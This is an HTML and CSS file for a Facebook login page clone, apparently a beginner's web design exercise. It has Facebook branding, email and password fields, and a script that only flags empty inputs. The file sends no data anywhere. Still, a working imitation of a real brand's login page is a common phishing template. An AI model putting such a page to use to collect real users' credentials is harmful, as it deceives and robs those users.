<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> Log in to Facebook</title>
    <link rel="icon" href="./fb.png">
    <style>


        .form1{
            margin: 130px;
            
            height: 50vh;
            width: 45vh;
            background-color: rgb(240, 246, 247);
            /* box-shadow: 10px 10px 5px rgb(119, 117, 117); */
            /* border-radius: 20px; */
            /* box-shadow: 1px 5px 5px 5px lightblue; */
            box-shadow: 10px 10px 5px lightblue;
           
       }

        input{
            padding: 15px;
            height: 10px;
            width: 80%;
            border-radius: 10px;
            background-color: white;
        }
        #btn1{
            background-color: blue;
            width: 100%;
            padding: 15px;
            border-radius: 15px;
            color: white;
            font-size: 20px;
            cursor: pointer;
        }
        #btn1:hover{
            color: white;
        }
        h5{
            margin-left: 60px;
            color: blue;
            font-size: 20PX;
            cursor: pointer;


        }
        h5:hover{
            text-decoration: underline;
        }
        #btn2{
            background-color: rgb(40, 243, 40);
            margin-left: 60px;
            padding: 18px;
            /* box-shadow: 12px 8px 30px greenyellow; */
            border-radius: 10px;
            cursor: pointer;
        }
        .contain{
            margin-left: 20px;
            padding: 30px;
            display: block;
            justify-content: first baseline;
            color: blue;
            font-size: 30px;
            font-family: Cambria, Cochin, Georgia, Times, 'Times New Roman', serif;
          
            
        }
        #errmsg1{
            color: red;
            display: none;
            /* margin-bottom: 2px; */
        }
        #errmsg2{
            color: red;
            display: none;   
            /* margin-bottom: 2px; */
        }

        .main{
            display: flex;
            align-items: center;
            justify-content: center;

        }
       
    </style>
</head>

<body>
            <div class="main">

            <div class="contain">
                <h1> facebook</h1>
                <p style="color: black;"> Facebook helps you connect and share <br> with the people in your life.</p>
            </div>

            <div class="form1">

                <form action="">
                    <fieldset>
                    <input type="text" placeholder="Email address or phone number" name="email"><br><br>
                        <small id="errmsg1">* invalid username *</small>
                     <input type="password" placeholder="Password" name="pass"><br><br>
                        <small id="errmsg2"> * invalid password * </small>
                     <button type="submit" id="btn1" ><a href="./code.html" style="color: white;">Log in</a></button>
                      <h5> Forgotten passowrd?</h5>

                        <button id="btn2"> Create new account</button>

                       
                    </fieldset>
                   
                        <p style="margin: center; font-size: 20px; font-family:sans-serif ; margin-top: 60px;" >stay connected with the World.. </p>
                    
                   
                </form>
            </div>
        </div>




            <script>
                let form = document.querySelector('form');
                // console.log(form);
                let small1 = document.getElementById('errmsg1');
                // console.log(small1);
                let small2 = document.getElementById('errmsg2');

                form.addEventListener("submit",(e)=>{
                   let email =  e.target.email.value;
                   let pass = e.target.pass.value;

                if(email ==""&& pass==""){
                    small1.style.display = "block";
                    small2.style.display = "block";
                    e.preventDefault();
                }

                else if(email ==""&& pass){
                    small1.style.display = "block";
                    e.preventDefault();

                }

                else if(email && pass==""){
                    small2.style.display = "block";
                    e.preventDefault();
                }

                
                })

                

                

            </script>
</body>
</html>